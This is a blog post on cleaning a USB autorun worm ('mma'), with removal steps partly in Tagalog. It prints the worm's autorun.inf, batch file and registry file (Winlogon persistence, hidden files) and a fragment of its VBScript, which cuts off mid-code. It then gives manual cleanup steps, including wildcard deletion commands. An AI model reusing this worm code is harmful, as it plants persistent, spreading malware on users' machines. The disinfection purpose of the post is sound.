Search in uioop.blogspot.com

Blog Archive

Tuesday, February 19, 2008

Infected With Autorun.inf, Mma.bat, Mma.rar, Mma.reg Mma.vbs

autorun.inf
Code:
[autorun]
open=
shell\open=Open(Sub7@Chatx.net)
shell\open\Command=WScript.exe .\mma.vbs
shell\open\Default=1
shell\explore=explore(Sub7@Chatx.net)
shell\explore\Command=WScript.exe .\mma.vbs


mma.bat
Code:
@echo off
if exist .\mma.reg regedit /s .\mma.reg
if not "%1"=="" goto open
if exist mma.vbs start WScript.exe mma.vbs&exit
if exist %SYSTEMROOT%\system32\mma.vbs start WScript.exe %SYSTEMROOT%\system32\mma.vbs&exit
exit
:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if "%1"=="+" attrib +s +a +h +r %2\mma.*
if "%1"=="+" attrib +s +a +h +r %2\autorun.inf
:end


mma.reg
Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,mma.bat"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000


mma.vbs
Code:
'dranyamcram v1.0
'Davao City Phils
'September 3, 2007
'Sub7@ChatX.net

on error resume next
Set WshShell =CreateObject("WScript.Shell")


For i=1 to 1

set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)

Solution 1
Download Flash_Disinfector.exe by sUBs and save it to your desktop.
  • Double-click Flash_Disinfector.exe to run it and follow any prompts that may appear.
  • The utility may ask you to insert your flash drive and/or other removable drives. Please do so and allow the utility to clean up those drives as well.
  • Wait until it has finished scanning and then exit the program.
  • Reboot your computer when done.
Note: Flash_Disinfector will create a hidden folder named autorun.inf in each partition and every USB drive plugged in when you ran it. Don't delete this folder...it will help protect your drives from future infection.

Reboot your computer in "Safe Mode" or "Safe Mode With Command Prompt" using the F8 method. To do this, restart your computer and after hearing your computer beep once during startup (but before the Windows icon appears) press the F8 key repeatedly. A menu will appear with several options. Use the arrow keys to navigate and select the option to run Windows in "Safe Mode With Command Prompt".

Go to Start > Run and type: cmd
  • press Ok.
  • At the command prompt, type in your primay drive location, usually C:
  • You may need to change the directory. If so type: cd \
  • Hit Enter.
  • Type: attrib -s -h -r -a autorun.inf
  • Hit Enter.
  • Type: dir
  • Hit Enter. This will allow you to see and confirm the Autorun files.
  • Type: del autorun.inf
  • Hit Enter.
  • Repeat the above commands for each drive on your computer.
Now search for and remove Mma.vbs, Mma.rar, Mma.regm Mma.bat if present.
  • At the command prompt, type in your primay drive location, usually C:
  • Hit Enter.
  • Type: attrib -s -h -r -a Mma.vbs
  • Hit Enter.
  • Type: dir /s Mma.vbs
  • Hit Enter.
  • If the file is present, type: del Mma.vbs
  • Hit Enter.
  • Repeat the above commands for each drive on your computer.
  • Then repeat these instructions for Mma.rar, Mma.regm Mma.bat
  • Exit the command prompt and reboot normally.
Solution 2
Do the following:

1. Run Task Manager (Ctrl-Alt-Del or right click on Taskbar)
2. Stop wscript.exe process if available by highlight mo lang ang process tapos press END TASK
3. Then terminate explorer.exe process.
4. In Task Manager, click on File -> New Task (Run…).
5. Type “cmd” (without quotes) into the Open text box and click OK.
6. Type the following command one by one followed by hitting Enter key:

Code:
del c:\autorun.* /f /s /q /a
del d:\autorun.* /f /s /q /a


Assuming hangang drive f yung iyong PC del f:\autorun.* /f /s /q /a

7. In Task Manager, click on File -> New Task (Run…).
8. Type regedit into the Open text box and click OK.
9. Navigate to the following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon

10) Check mo eto:

“Userinit”=”C:\WINDOWS\system32\userinit.exe,”

Dapat ganyan ang nakalagay sa registry. Pag merong nakasabay na iba like mma.bat delete mo lang.


11) Restart your computer in safe mode

12) Disable Restore mode

13) Open Notepad and copy the following:

attrib -H -R c:\mma.bat
attrib -H -R c:\mma.rar
attrib -H -R c:\mma.reg
attrib -H -R c:\mma.vbs
attrib -H -R d:\mma.bat
attrib -H -R d:\mma.rar
attrib -H -R d:\mma.reg
attrib -H -R d:\mma.vbs


If madami ang iyong drives continue mo lang.. (like attrib -H -R f:\mma.vbs


14) Save it to "remove.bat" then double click. (in this way makita mo na yung mga files)

15) Punta ka na sa mga root directory ng drives and delete mo na eto lahat:

Code:
mma.bat
mma.rar
mma.reg
mma.vbs
Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

AVG Internet Security 2013

Upgrade to AVG Internet Security 2013

Total Pageviews

Contributors